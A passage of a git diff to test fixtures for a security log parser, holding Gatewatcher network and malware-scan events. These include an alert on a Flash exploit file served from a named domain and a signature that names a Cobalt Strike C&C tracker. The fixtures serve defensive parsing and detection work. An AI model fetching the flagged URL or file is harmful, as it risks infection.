\"threat_details\": \"EXP/Flash.EB.502\",\n \"id\": \"acf9bba\"\n },\n \"11\": {\n \"scan_result\": \"NOT_SCANNED\",\n \"threat_details\": \"Unavailable (permanently_failed)\",\n \"id\": \"n00000e\"\n },\n \"2\": {\n \"scan_result\": \"INFECTED\",\n \"threat_details\": \"SWF/Exploit\",\n \"id\": \"af7872b\"\n }\n },\n \"detail_wait_time\": 660,\n \"file_type_description\": \"Macromedia Flash Player\",\n \"code\": 1,\n \"magic_details\": \"Macromedia 
Flash data (compressed), version 13\",\n \"analyzed_other\": 4\n },\n \"@version\": \"1\",\n \"network\": {\n \"protocol\": \"http\",\n \"timestamp\": \"2024-09-11T09:15:23.329615+0000\",\n \"transport\": \"tcp\",\n \"flow_id\": 1779492455056060\n },\n \"destination\": {\n \"port\": 47858,\n \"ip\": \"27.0.0.144\"\n },\n \"url\": {\n \"domain\": \"chunky.enchantingweddingsandevents.co.uk\",\n \"path\": \"/?q=&g=BDvv&y=enL16_6s_&s=t5qV-&e=_b_J--DqR&w=C2pZhaRyfn3uVT_v5Sfgs\"\n },\n \"user_agent\": {\n \"original\": \"Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\"\n },\n \"ecs\": {\n \"version\": \"8.6.0\"\n },\n \"http\": {\n \"request\": {\n \"method\": \"GET\"\n },\n \"hostname\": \"chunky.enchantingweddingsandevents.co.uk\",\n \"version\": \"HTTP/1.1\",\n \"http_refer\": \"http://chunky.enchantingweddingsandevents.co.uk/topic/03251-esplanade-interoperability-fuchsias-renegotiate-percent-youngster-trounced/\",\n \"response\": {\n \"status\": 200,\n \"mime_type\": \"application/x-shockwave-flash\",\n \"bytes\": 55351\n }\n },\n \"event\": {\n \"id\": \"7c4e2a77-3481-4201-8247-889fe0718ed8\",\n \"kind\": \"alert\",\n \"module\": \"malcore\",\n \"severity\": 1,\n \"category\": [\n \"network\",\n \"file\"\n ],\n \"created\": \"2024-09-11T09:15:23.329615+0000\",\n \"dataset\": \"alert\"\n }\n}" + } }, "expected": { "message": "{\n \"observer\": {\n \"vendor\": \"gatewatcher\",\n \"uuid\": \"78f4fed1-c9ad-52b9-b509-6b87767f501f\",\n \"gcap\": {\n \"ingress\": {\n \"interface\": {\n \"name\": \"monvirt\"\n }\n },\n \"hostname\": \"gcap-clement-l.gatewatcher.fr\",\n \"version\": \"2.5.4.0-rc1\"\n },\n \"version\": \"2.5.3.103\",\n \"log_format_version\": \"1.0.0\",\n \"hostname\": \"gcenter-clelyo-01.gatewatcher.com\",\n \"product\": \"gcenter\"\n },\n \"source\": {\n \"port\": 80,\n \"ip\": \"202.129.215.251\"\n },\n \"file\": {\n \"magic\": \"Macromedia Flash data (compressed), version 13\",\n \"sid\": [\n 1100020\n ],\n \"hash\": {\n \"sha256\": 
\"6d3a6e2c771ab1a3721235ed3b3c4a2c3013290564272bcb6fbc9a15be79278b\"\n },\n \"name\": \"/\",\n \"file_id\": 219,\n \"tx_id\": 2,\n \"state\": \"CLOSED\",\n \"gaps\": false,\n \"size\": 55351,\n \"stored\": true\n },\n \"@timestamp\": \"2024-09-11T09:31:00.111583612Z\",\n \"malcore\": {\n \"file_type\": \"application/x-shockwave-flash\",\n \"analyzers_up\": 16,\n \"analyzed_clean\": 9,\n \"engines_last_update_date\": \"2024-09-03T17:15:00Z\",\n \"state\": \"Infected\",\n \"total_found\": \"3/16\",\n \"detail_scan_time\": 373,\n \"reporting_token\": \"\",\n \"analyzed_infected\": 3,\n \"detail_threat_found\": \"Infected : EXP/Flash.EB.502, SWF/Exploit, Exploit.Flash\",\n \"analyzed_suspicious\": 0,\n \"analyzed_error\": 0,\n \"processing_time\": 1576,\n \"engine_id\": {\n \"5\": {\n \"scan_result\": \"CLEAN\",\n \"threat_details\": \"\",\n \"id\": \"c18ab9n\"\n },\n \"8\": {\n \"scan_result\": \"INFECTED\",\n \"threat_details\": \"Exploit.Flash\",\n \"id\": \"ib54e9s\"\n },\n \"4\": {\n \"scan_result\": \"UNSUPPORTED_FILE_TYPE\",\n \"threat_details\": \"\",\n \"id\": \"c10195e\"\n },\n \"14\": {\n \"scan_result\": \"CLEAN\",\n \"threat_details\": \"\",\n \"id\": \"t3114fn\"\n },\n \"13\": {\n \"scan_result\": \"CLEAN\",\n \"threat_details\": \"\",\n \"id\": \"sde882s\"\n },\n \"9\": {\n \"scan_result\": \"CLEAN\",\n \"threat_details\": \"\",\n \"id\": \"kfb8487\"\n },\n \"12\": {\n \"scan_result\": \"CLEAN\",\n \"threat_details\": \"\",\n \"id\": \"qb9308l\"\n },\n \"10\": {\n \"scan_result\": \"CLEAN\",\n \"threat_details\": \"\",\n \"id\": \"mb2b5fe\"\n },\n \"0\": {\n \"scan_result\": \"CLEAN\",\n \"threat_details\": \"\",\n \"id\": \"a32935b\"\n },\n \"15\": {\n \"scan_result\": \"UNSUPPORTED_FILE_TYPE\",\n \"threat_details\": \"\",\n \"id\": \"we9a17t\"\n },\n \"6\": {\n \"scan_result\": \"CLEAN\",\n \"threat_details\": \"\",\n \"id\": \"c81e55c\"\n },\n \"7\": {\n \"scan_result\": \"NOT_SCANNED\",\n \"threat_details\": \"\",\n \"id\": \"e83bf1t\"\n },\n \"3\": 
{\n \"scan_result\": \"CLEAN\",\n \"threat_details\": \"\",\n \"id\": \"b557a5r\"\n },\n \"1\": {\n \"scan_result\": \"INFECTED\",\n \"threat_details\": \"EXP/Flash.EB.502\",\n \"id\": \"acf9bba\"\n },\n \"11\": {\n \"scan_result\": \"NOT_SCANNED\",\n \"threat_details\": \"Unavailable (permanently_failed)\",\n \"id\": \"n00000e\"\n },\n \"2\": {\n \"scan_result\": \"INFECTED\",\n \"threat_details\": \"SWF/Exploit\",\n \"id\": \"af7872b\"\n }\n },\n \"detail_wait_time\": 660,\n \"file_type_description\": \"Macromedia Flash Player\",\n \"code\": 1,\n \"magic_details\": \"Macromedia Flash data (compressed), version 13\",\n \"analyzed_other\": 4\n },\n \"@version\": \"1\",\n \"network\": {\n \"protocol\": \"http\",\n \"timestamp\": \"2024-09-11T09:15:23.329615+0000\",\n \"transport\": \"tcp\",\n \"flow_id\": 1779492455056060\n },\n \"destination\": {\n \"port\": 47858,\n \"ip\": \"27.0.0.144\"\n },\n \"url\": {\n \"domain\": \"chunky.enchantingweddingsandevents.co.uk\",\n \"path\": \"/?q=&g=BDvv&y=enL16_6s_&s=t5qV-&e=_b_J--DqR&w=C2pZhaRyfn3uVT_v5Sfgs\"\n },\n \"user_agent\": {\n \"original\": \"Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\"\n },\n \"ecs\": {\n \"version\": \"8.6.0\"\n },\n \"http\": {\n \"request\": {\n \"method\": \"GET\"\n },\n \"hostname\": \"chunky.enchantingweddingsandevents.co.uk\",\n \"version\": \"HTTP/1.1\",\n \"http_refer\": \"http://chunky.enchantingweddingsandevents.co.uk/topic/03251-esplanade-interoperability-fuchsias-renegotiate-percent-youngster-trounced/\",\n \"response\": {\n \"status\": 200,\n \"mime_type\": \"application/x-shockwave-flash\",\n \"bytes\": 55351\n }\n },\n \"event\": {\n \"id\": \"7c4e2a77-3481-4201-8247-889fe0718ed8\",\n \"kind\": \"alert\",\n \"module\": \"malcore\",\n \"severity\": 1,\n \"category\": [\n \"network\",\n \"file\"\n ],\n \"created\": \"2024-09-11T09:15:23.329615+0000\",\n \"dataset\": \"alert\"\n }\n}", 
diff --git a/GateWatcher/aioniq_ecs/tests/metadata.json b/GateWatcher/aioniq_ecs/tests/metadata.json
index 0530043dc..124260a3d 100644
--- a/GateWatcher/aioniq_ecs/tests/metadata.json
+++ b/GateWatcher/aioniq_ecs/tests/metadata.json
@@ -1,12 +1,12 @@ { "input": { + "message": "{\n \"observer\": {\n \"vendor\": \"gatewatcher\",\n \"uuid\": \"78f4fed1-c9ad-52b9-b509-6b87767f501f\",\n \"gcap\": {\n \"ingress\": {\n \"interface\": {\n \"name\": \"monvirt\"\n }\n },\n \"hostname\": \"gcap-clement-l.gatewatcher.fr\",\n \"version\": \"2.5.4.0-rc1\"\n },\n \"version\": \"2.5.3.103\",\n \"log_format_version\": \"1.0.0\",\n \"hostname\": \"gcenter-clelyo-01.gatewatcher.com\",\n \"product\": \"gcenter\"\n },\n \"source\": {\n \"mac\": \"00:50:56:91:85:03\",\n \"port\": 56098,\n \"ip\": \"10.2.19.131\"\n },\n \"metadata\": {\n \"flowbits\": [\n \"min.gethttp\",\n \"exe.no.referer\",\n \"ET.http.binary\"\n ]\n },\n \"@timestamp\": \"2024-09-12T13:24:51.231Z\",\n \"@version\": \"1\",\n \"network\": {\n \"protocol\": \"http\",\n \"community_id\": \"1:X+96B6BxVtmLT4rsbtdZeemyV0M=\",\n \"timestamp\": \"2024-09-12T13:24:15.978904+0000\",\n \"transport\": \"tcp\",\n \"tx_id\": 6,\n \"flow_id\": 803295979358070\n },\n \"destination\": {\n \"mac\": \"00:09:0f:09:00:12\",\n \"port\": 80,\n \"ip\": \"10.2.10.205\"\n },\n \"url\": {\n \"path\": \"/FireInstaller4.exe\"\n },\n \"user_agent\": {\n \"original\": \"nghttp2/1.43.0\"\n },\n \"ecs\": {\n \"version\": \"8.6.0\"\n },\n \"http\": {\n \"request_headers\": [\n {\n \"name\": \":method\",\n \"value\": \"GET\"\n },\n {\n \"name\": \":path\",\n \"value\": \"/FireInstaller4.exe\"\n },\n {\n \"name\": \":scheme\",\n \"value\": \"http\"\n },\n {\n \"name\": \":authority\",\n \"value\": \"10.2.10.205\"\n },\n {\n \"name\": \"accept\",\n \"value\": \"*/*\"\n },\n {\n \"name\": \"accept-encoding\",\n \"value\": \"gzip, deflate\"\n },\n {\n \"name\": \"user-agent\",\n \"value\": \"nghttp2/1.43.0\"\n }\n ],\n \"http2\": {\n \"request\": {\n \"priority\": 15\n },\n \"stream_id\": 13,\n \"response\": {}\n },\n \"request\": {\n \"method\": \"GET\"\n },\n \"response_headers\": [\n {\n \"name\": \":status\",\n \"value\": \"200\"\n },\n {\n \"name\": \"server\",\n \"value\": 
\"nginx/1.25.2\"\n },\n {\n \"name\": \"date\",\n \"value\": \"Mon, 08 Jan 2024 15:27:20 GMT\"\n },\n {\n \"name\": \"content-type\",\n \"value\": \"text/plain\"\n },\n {\n \"name\": \"content-length\",\n \"value\": \"319824\"\n },\n {\n \"name\": \"last-modified\",\n \"value\": \"Mon, 08 Jan 2024 15:21:12 GMT\"\n },\n {\n \"name\": \"etag\",\n \"value\": \"\\\"659c12e8-4e150\\\"\"\n },\n {\n \"name\": \"accept-ranges\",\n \"value\": \"bytes\"\n }\n ],\n \"version\": \"2\",\n \"response\": {\n \"status\": 200,\n \"bytes\": 319824\n }\n },\n \"event\": {\n \"kind\": \"event\",\n \"module\": \"sigflow_http\",\n \"category\": [\n \"network\"\n ],\n \"created\": \"2024-09-12T13:24:15.978904+0000\",\n \"dataset\": \"network_metadata\",\n \"id\": \"78681613-57af-4e10-b732-58f5d2e0ae12\"\n }\n}", "sekoiaio": { "intake": { "dialect": "Gatewatcher AionIQ V103", "dialect_uuid": "e9fbba55-89c2-4b6c-ad15-9a46412dd680" } - }, - "message": "{\n \"observer\": {\n \"vendor\": \"gatewatcher\",\n \"uuid\": \"78f4fed1-c9ad-52b9-b509-6b87767f501f\",\n \"gcap\": {\n \"ingress\": {\n \"interface\": {\n \"name\": \"monvirt\"\n }\n },\n \"hostname\": \"gcap-clement-l.gatewatcher.fr\",\n \"version\": \"2.5.4.0-rc1\"\n },\n \"version\": \"2.5.3.103\",\n \"log_format_version\": \"1.0.0\",\n \"hostname\": \"gcenter-clelyo-01.gatewatcher.com\",\n \"product\": \"gcenter\"\n },\n \"source\": {\n \"mac\": \"00:50:56:91:85:03\",\n \"port\": 56098,\n \"ip\": \"10.2.19.131\"\n },\n \"metadata\": {\n \"flowbits\": [\n \"min.gethttp\",\n \"exe.no.referer\",\n \"ET.http.binary\"\n ]\n },\n \"@timestamp\": \"2024-09-12T13:24:51.231Z\",\n \"@version\": \"1\",\n \"network\": {\n \"protocol\": \"http\",\n \"community_id\": \"1:X+96B6BxVtmLT4rsbtdZeemyV0M=\",\n \"timestamp\": \"2024-09-12T13:24:15.978904+0000\",\n \"transport\": \"tcp\",\n \"tx_id\": 6,\n \"flow_id\": 803295979358070\n },\n \"destination\": {\n \"mac\": \"00:09:0f:09:00:12\",\n \"port\": 80,\n \"ip\": \"10.2.10.205\"\n },\n \"url\": {\n 
\"path\": \"/FireInstaller4.exe\"\n },\n \"user_agent\": {\n \"original\": \"nghttp2/1.43.0\"\n },\n \"ecs\": {\n \"version\": \"8.6.0\"\n },\n \"http\": {\n \"request_headers\": [\n {\n \"name\": \":method\",\n \"value\": \"GET\"\n },\n {\n \"name\": \":path\",\n \"value\": \"/FireInstaller4.exe\"\n },\n {\n \"name\": \":scheme\",\n \"value\": \"http\"\n },\n {\n \"name\": \":authority\",\n \"value\": \"10.2.10.205\"\n },\n {\n \"name\": \"accept\",\n \"value\": \"*/*\"\n },\n {\n \"name\": \"accept-encoding\",\n \"value\": \"gzip, deflate\"\n },\n {\n \"name\": \"user-agent\",\n \"value\": \"nghttp2/1.43.0\"\n }\n ],\n \"http2\": {\n \"request\": {\n \"priority\": 15\n },\n \"stream_id\": 13,\n \"response\": {}\n },\n \"request\": {\n \"method\": \"GET\"\n },\n \"response_headers\": [\n {\n \"name\": \":status\",\n \"value\": \"200\"\n },\n {\n \"name\": \"server\",\n \"value\": \"nginx/1.25.2\"\n },\n {\n \"name\": \"date\",\n \"value\": \"Mon, 08 Jan 2024 15:27:20 GMT\"\n },\n {\n \"name\": \"content-type\",\n \"value\": \"text/plain\"\n },\n {\n \"name\": \"content-length\",\n \"value\": \"319824\"\n },\n {\n \"name\": \"last-modified\",\n \"value\": \"Mon, 08 Jan 2024 15:21:12 GMT\"\n },\n {\n \"name\": \"etag\",\n \"value\": \"\\\"659c12e8-4e150\\\"\"\n },\n {\n \"name\": \"accept-ranges\",\n \"value\": \"bytes\"\n }\n ],\n \"version\": \"2\",\n \"response\": {\n \"status\": 200,\n \"bytes\": 319824\n }\n },\n \"event\": {\n \"kind\": \"event\",\n \"module\": \"sigflow_http\",\n \"category\": [\n \"network\"\n ],\n \"created\": \"2024-09-12T13:24:15.978904+0000\",\n \"dataset\": \"network_metadata\",\n \"id\": \"78681613-57af-4e10-b732-58f5d2e0ae12\"\n }\n}" + } }, "expected": { "message": "{\n \"observer\": {\n \"vendor\": \"gatewatcher\",\n \"uuid\": \"78f4fed1-c9ad-52b9-b509-6b87767f501f\",\n \"gcap\": {\n \"ingress\": {\n \"interface\": {\n \"name\": \"monvirt\"\n }\n },\n \"hostname\": \"gcap-clement-l.gatewatcher.fr\",\n \"version\": \"2.5.4.0-rc1\"\n 
},\n \"version\": \"2.5.3.103\",\n \"log_format_version\": \"1.0.0\",\n \"hostname\": \"gcenter-clelyo-01.gatewatcher.com\",\n \"product\": \"gcenter\"\n },\n \"source\": {\n \"mac\": \"00:50:56:91:85:03\",\n \"port\": 56098,\n \"ip\": \"10.2.19.131\"\n },\n \"metadata\": {\n \"flowbits\": [\n \"min.gethttp\",\n \"exe.no.referer\",\n \"ET.http.binary\"\n ]\n },\n \"@timestamp\": \"2024-09-12T13:24:51.231Z\",\n \"@version\": \"1\",\n \"network\": {\n \"protocol\": \"http\",\n \"community_id\": \"1:X+96B6BxVtmLT4rsbtdZeemyV0M=\",\n \"timestamp\": \"2024-09-12T13:24:15.978904+0000\",\n \"transport\": \"tcp\",\n \"tx_id\": 6,\n \"flow_id\": 803295979358070\n },\n \"destination\": {\n \"mac\": \"00:09:0f:09:00:12\",\n \"port\": 80,\n \"ip\": \"10.2.10.205\"\n },\n \"url\": {\n \"path\": \"/FireInstaller4.exe\"\n },\n \"user_agent\": {\n \"original\": \"nghttp2/1.43.0\"\n },\n \"ecs\": {\n \"version\": \"8.6.0\"\n },\n \"http\": {\n \"request_headers\": [\n {\n \"name\": \":method\",\n \"value\": \"GET\"\n },\n {\n \"name\": \":path\",\n \"value\": \"/FireInstaller4.exe\"\n },\n {\n \"name\": \":scheme\",\n \"value\": \"http\"\n },\n {\n \"name\": \":authority\",\n \"value\": \"10.2.10.205\"\n },\n {\n \"name\": \"accept\",\n \"value\": \"*/*\"\n },\n {\n \"name\": \"accept-encoding\",\n \"value\": \"gzip, deflate\"\n },\n {\n \"name\": \"user-agent\",\n \"value\": \"nghttp2/1.43.0\"\n }\n ],\n \"http2\": {\n \"request\": {\n \"priority\": 15\n },\n \"stream_id\": 13,\n \"response\": {}\n },\n \"request\": {\n \"method\": \"GET\"\n },\n \"response_headers\": [\n {\n \"name\": \":status\",\n \"value\": \"200\"\n },\n {\n \"name\": \"server\",\n \"value\": \"nginx/1.25.2\"\n },\n {\n \"name\": \"date\",\n \"value\": \"Mon, 08 Jan 2024 15:27:20 GMT\"\n },\n {\n \"name\": \"content-type\",\n \"value\": \"text/plain\"\n },\n {\n \"name\": \"content-length\",\n \"value\": \"319824\"\n },\n {\n \"name\": \"last-modified\",\n \"value\": \"Mon, 08 Jan 2024 15:21:12 GMT\"\n },\n 
{\n \"name\": \"etag\",\n \"value\": \"\\\"659c12e8-4e150\\\"\"\n },\n {\n \"name\": \"accept-ranges\",\n \"value\": \"bytes\"\n }\n ],\n \"version\": \"2\",\n \"response\": {\n \"status\": 200,\n \"bytes\": 319824\n }\n },\n \"event\": {\n \"kind\": \"event\",\n \"module\": \"sigflow_http\",\n \"category\": [\n \"network\"\n ],\n \"created\": \"2024-09-12T13:24:15.978904+0000\",\n \"dataset\": \"network_metadata\",\n \"id\": \"78681613-57af-4e10-b732-58f5d2e0ae12\"\n }\n}", diff --git a/GateWatcher/aioniq_ecs/tests/metadata_fileinfo.json b/GateWatcher/aioniq_ecs/tests/metadata_fileinfo.json index d575e8d2a..c75ee56b5 100644 --- a/GateWatcher/aioniq_ecs/tests/metadata_fileinfo.json +++ b/GateWatcher/aioniq_ecs/tests/metadata_fileinfo.json 
@@ -1,12 +1,12 @@ { "input": { + "message": "{\n \"observer\": {\n \"vendor\": \"gatewatcher\",\n \"uuid\": \"78f4fed1-c9ad-52b9-b509-6b87767f501f\",\n \"gcap\": {\n \"ingress\": {\n \"interface\": {\n \"name\": \"monvirt\"\n }\n },\n \"hostname\": \"gcap-clement-l.gatewatcher.fr\",\n \"version\": \"2.5.4.0-rc1\"\n },\n \"version\": \"2.5.3.103\",\n \"log_format_version\": \"1.0.0\",\n \"hostname\": \"gcenter-clelyo-01.gatewatcher.com\",\n \"product\": \"gcenter\"\n },\n \"source\": {\n \"port\": 80,\n \"ip\": \"56.53.117.115\"\n },\n \"file\": {\n \"magic\": \"PDF document, version 1.5\",\n \"sid\": [\n 1100008\n ],\n \"hash\": {\n \"sha256\": \"50c561f1e32cb1990a3050015088713e657f0081ba774dda2f9fcef828dcf703\"\n },\n \"name\": \"/malcore_10KB_clean.pdf\",\n \"file_id\": 224,\n \"tx_id\": 0,\n \"state\": \"CLOSED\",\n \"gaps\": false,\n \"size\": 10456,\n \"stored\": true\n },\n \"@timestamp\": \"2024-09-11T13:56:19.010Z\",\n \"@version\": \"1\",\n \"network\": {\n \"protocol\": \"http\",\n \"timestamp\": \"2024-09-11T13:55:51.326090+0000\",\n \"transport\": \"tcp\",\n \"flow_id\": 1331841998458539\n },\n \"destination\": {\n \"port\": 62832,\n \"ip\": \"65.100.113.120\"\n },\n \"url\": {\n \"domain\": \"56.53.117.115\",\n \"path\": \"/malcore_10KB_clean.pdf\"\n },\n \"ecs\": {\n \"version\": \"8.6.0\"\n },\n \"http\": {\n \"request\": {\n \"method\": \"GET\"\n },\n \"hostname\": \"56.53.117.115\",\n \"version\": \"HTTP/1.1\",\n \"response\": {\n \"status\": 200,\n \"mime_type\": \"application/pdf\",\n \"bytes\": 10456\n }\n },\n \"event\": {\n \"kind\": \"event\",\n \"module\": \"sigflow_file\",\n \"category\": [\n \"network\",\n \"file\"\n ],\n \"created\": \"2024-09-11T13:55:51.326090+0000\",\n \"dataset\": \"network_metadata\",\n \"id\": \"d66539e6-825e-4516-8c8c-2778dd6d9358\"\n }\n}", "sekoiaio": { "intake": { "dialect": "Gatewatcher AionIQ V103", "dialect_uuid": "e9fbba55-89c2-4b6c-ad15-9a46412dd680" } - }, - "message": "{\n \"observer\": {\n \"vendor\": 
\"gatewatcher\",\n \"uuid\": \"78f4fed1-c9ad-52b9-b509-6b87767f501f\",\n \"gcap\": {\n \"ingress\": {\n \"interface\": {\n \"name\": \"monvirt\"\n }\n },\n \"hostname\": \"gcap-clement-l.gatewatcher.fr\",\n \"version\": \"2.5.4.0-rc1\"\n },\n \"version\": \"2.5.3.103\",\n \"log_format_version\": \"1.0.0\",\n \"hostname\": \"gcenter-clelyo-01.gatewatcher.com\",\n \"product\": \"gcenter\"\n },\n \"source\": {\n \"port\": 80,\n \"ip\": \"56.53.117.115\"\n },\n \"file\": {\n \"magic\": \"PDF document, version 1.5\",\n \"sid\": [\n 1100008\n ],\n \"hash\": {\n \"sha256\": \"50c561f1e32cb1990a3050015088713e657f0081ba774dda2f9fcef828dcf703\"\n },\n \"name\": \"/malcore_10KB_clean.pdf\",\n \"file_id\": 224,\n \"tx_id\": 0,\n \"state\": \"CLOSED\",\n \"gaps\": false,\n \"size\": 10456,\n \"stored\": true\n },\n \"@timestamp\": \"2024-09-11T13:56:19.010Z\",\n \"@version\": \"1\",\n \"network\": {\n \"protocol\": \"http\",\n \"timestamp\": \"2024-09-11T13:55:51.326090+0000\",\n \"transport\": \"tcp\",\n \"flow_id\": 1331841998458539\n },\n \"destination\": {\n \"port\": 62832,\n \"ip\": \"65.100.113.120\"\n },\n \"url\": {\n \"domain\": \"56.53.117.115\",\n \"path\": \"/malcore_10KB_clean.pdf\"\n },\n \"ecs\": {\n \"version\": \"8.6.0\"\n },\n \"http\": {\n \"request\": {\n \"method\": \"GET\"\n },\n \"hostname\": \"56.53.117.115\",\n \"version\": \"HTTP/1.1\",\n \"response\": {\n \"status\": 200,\n \"mime_type\": \"application/pdf\",\n \"bytes\": 10456\n }\n },\n \"event\": {\n \"kind\": \"event\",\n \"module\": \"sigflow_file\",\n \"category\": [\n \"network\",\n \"file\"\n ],\n \"created\": \"2024-09-11T13:55:51.326090+0000\",\n \"dataset\": \"network_metadata\",\n \"id\": \"d66539e6-825e-4516-8c8c-2778dd6d9358\"\n }\n}" + } }, "expected": { "message": "{\n \"observer\": {\n \"vendor\": \"gatewatcher\",\n \"uuid\": \"78f4fed1-c9ad-52b9-b509-6b87767f501f\",\n \"gcap\": {\n \"ingress\": {\n \"interface\": {\n \"name\": \"monvirt\"\n }\n },\n \"hostname\": 
\"gcap-clement-l.gatewatcher.fr\",\n \"version\": \"2.5.4.0-rc1\"\n },\n \"version\": \"2.5.3.103\",\n \"log_format_version\": \"1.0.0\",\n \"hostname\": \"gcenter-clelyo-01.gatewatcher.com\",\n \"product\": \"gcenter\"\n },\n \"source\": {\n \"port\": 80,\n \"ip\": \"56.53.117.115\"\n },\n \"file\": {\n \"magic\": \"PDF document, version 1.5\",\n \"sid\": [\n 1100008\n ],\n \"hash\": {\n \"sha256\": \"50c561f1e32cb1990a3050015088713e657f0081ba774dda2f9fcef828dcf703\"\n },\n \"name\": \"/malcore_10KB_clean.pdf\",\n \"file_id\": 224,\n \"tx_id\": 0,\n \"state\": \"CLOSED\",\n \"gaps\": false,\n \"size\": 10456,\n \"stored\": true\n },\n \"@timestamp\": \"2024-09-11T13:56:19.010Z\",\n \"@version\": \"1\",\n \"network\": {\n \"protocol\": \"http\",\n \"timestamp\": \"2024-09-11T13:55:51.326090+0000\",\n \"transport\": \"tcp\",\n \"flow_id\": 1331841998458539\n },\n \"destination\": {\n \"port\": 62832,\n \"ip\": \"65.100.113.120\"\n },\n \"url\": {\n \"domain\": \"56.53.117.115\",\n \"path\": \"/malcore_10KB_clean.pdf\"\n },\n \"ecs\": {\n \"version\": \"8.6.0\"\n },\n \"http\": {\n \"request\": {\n \"method\": \"GET\"\n },\n \"hostname\": \"56.53.117.115\",\n \"version\": \"HTTP/1.1\",\n \"response\": {\n \"status\": 200,\n \"mime_type\": \"application/pdf\",\n \"bytes\": 10456\n }\n },\n \"event\": {\n \"kind\": \"event\",\n \"module\": \"sigflow_file\",\n \"category\": [\n \"network\",\n \"file\"\n ],\n \"created\": \"2024-09-11T13:55:51.326090+0000\",\n \"dataset\": \"network_metadata\",\n \"id\": \"d66539e6-825e-4516-8c8c-2778dd6d9358\"\n }\n}", diff --git a/GateWatcher/aioniq_ecs/tests/nba.json b/GateWatcher/aioniq_ecs/tests/nba.json index c4540e394..956e08288 100644 --- a/GateWatcher/aioniq_ecs/tests/nba.json +++ b/GateWatcher/aioniq_ecs/tests/nba.json 
@@ -1,12 +1,12 @@ { "input": { + "message": "{\n \"observer\": {\n \"hostname\": \"gcenter-interne-rd-56.gatewatcher.com\",\n \"product\": \"gcenter\",\n \"version\": \"2.5.3.103\",\n \"vendor\": \"gatewatcher\",\n \"gcap\": {\n \"hostname\": \"gcap-interne-rd-55.gatewatcher.com\",\n \"version\": \"2.5.3.107\",\n \"ingress\": {\n \"interface\": {\n \"name\": \"mon0\"\n }\n }\n },\n \"log_format_version\": \"1.0.0\"\n },\n \"event\": {\n \"kind\": \"alert\",\n \"dataset\": \"alert\",\n \"category\": [\n \"network\",\n \"intrusion_detection\"\n ],\n \"module\": \"network_behavior_analytics\",\n \"created\": \"2022-09-01T16:06:15.605Z\",\n \"id\": \"730a47f1-f7b1-4faa-9d61-8a41d7b138ed\",\n \"severity\": 2\n },\n \"ecs\": {\n \"version\": \"8.6.0\"\n },\n \"network\": {\n \"transport\": \"tcp\",\n \"protocol\": \"http\",\n \"flow_id\": 2071994639527866,\n \"community_id\": \"1:Q22WBDRnlyCXH/Y/pcypXCr+nJc=\",\n \"timestamp\": \"2022-09-01T16:06:15.605Z\",\n \"tx_id\": 0\n },\n \"source\": {\n \"ip\": \"10.2.6.250\",\n \"port\": 50886,\n \"mac\": \"00:50:56:91:73:14\"\n },\n \"destination\": {\n \"ip\": \"13.107.4.52\",\n \"port\": 80,\n \"mac\": \"00:08:e3:ff:fc:28\"\n },\n \"nba\": {\n \"packet\": \"AAjj//woAFBWkXMUCABFAAAo6pNAAEAGLaIKAgb6DWsENMbGAFBecku30OsVlVAQAfUzhAAAAAAAAAAA\",\n \"payload\": \"R0VUIC9jb25uZWN0dGVzdC50eHQgSFRUUC8xLjENClByYWdtYTogbm8tY2FjaGUNClVzZXItQWdlbnQ6IE1pY3Jvc29mdCBOQ1NJDQpIb3N0OiB3d3cubXNmdGNvbm5lY3R0ZXN0LmNvbQ0KQ2FjaGUtQ29udHJvbDogbm8tY2FjaGUNCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCg0K\",\n \"payload_printable\": \"GET /connecttest.txt HTTP/1.1\\r\\nPragma: no-cache\\r\\nUser-Agent: Microsoft NCSI\\r\\nHost: www.msftconnecttest.com\\r\\nCache-Control: no-cache\\r\\nConnection: keep-alive\\r\\n\\r\\n\",\n \"signature_id\": 2031071,\n \"gid\": 1,\n \"category\": \"Network Behavior Analytics\",\n \"action\": \"allowed\",\n \"signature\": \"NBA C&C tracker : cobalt strike tcp initialization\",\n \"metadata\": {\n \"performance_impact\": [\n 
\"High\"\n ],\n \"signature_severity\": [\n \"CRITICAL\"\n ]\n },\n \"rev\": 1,\n \"stream\": 1\n },\n \"http\": {\n \"url\": \"/connecttest.txt\",\n \"http_user_agent\": \"Microsoft NCSI\",\n \"version\": \"HTTP/1.1\",\n \"hostname\": \"www.msftconnecttest.com\",\n \"request\": {\n \"method\": \"GET\"\n },\n \"response\": {\n \"bytes\": 22,\n \"status_code\": 200,\n \"mime_type\": \"text/plain\"\n }\n },\n \"url\": {\n \"domain\": \"www.msftconnecttest.com\",\n \"path\": \"/connecttest.txt\"\n },\n \"user_agent\": {\n \"original\": \"Microsoft NCSI\"\n },\n \"packet_info\": {\n \"linktype\": 1\n },\n \"flow\": {\n \"bytes_toclient\": 700,\n \"pkts_toclient\": 3,\n \"bytes_toserver\": 407,\n \"pkts_toserver\": 4,\n \"start\": \"2022-09-01T16:06:15.602042+0000\"\n },\n \"@version\": \"1\",\n \"@timestamp\": \"2022-09-01T16:06:51.664Z\"\n}", "sekoiaio": { "intake": { "dialect": "Gatewatcher AionIQ V103", "dialect_uuid": "e9fbba55-89c2-4b6c-ad15-9a46412dd680" } - }, - "message": "{\n \"observer\": {\n \"hostname\": \"gcenter-interne-rd-56.gatewatcher.com\",\n \"product\": \"gcenter\",\n \"version\": \"2.5.3.103\",\n \"vendor\": \"gatewatcher\",\n \"gcap\": {\n \"hostname\": \"gcap-interne-rd-55.gatewatcher.com\",\n \"version\": \"2.5.3.107\",\n \"ingress\": {\n \"interface\": {\n \"name\": \"mon0\"\n }\n }\n },\n \"log_format_version\": \"1.0.0\"\n },\n \"event\": {\n \"kind\": \"alert\",\n \"dataset\": \"alert\",\n \"category\": [\n \"network\",\n \"intrusion_detection\"\n ],\n \"module\": \"network_behavior_analytics\",\n \"created\": \"2022-09-01T16:06:15.605Z\",\n \"id\": \"730a47f1-f7b1-4faa-9d61-8a41d7b138ed\",\n \"severity\": 2\n },\n \"ecs\": {\n \"version\": \"8.6.0\"\n },\n \"network\": {\n \"transport\": \"tcp\",\n \"protocol\": \"http\",\n \"flow_id\": 2071994639527866,\n \"community_id\": \"1:Q22WBDRnlyCXH/Y/pcypXCr+nJc=\",\n \"timestamp\": \"2022-09-01T16:06:15.605Z\",\n \"tx_id\": 0\n },\n \"source\": {\n \"ip\": \"10.2.6.250\",\n \"port\": 50886,\n 
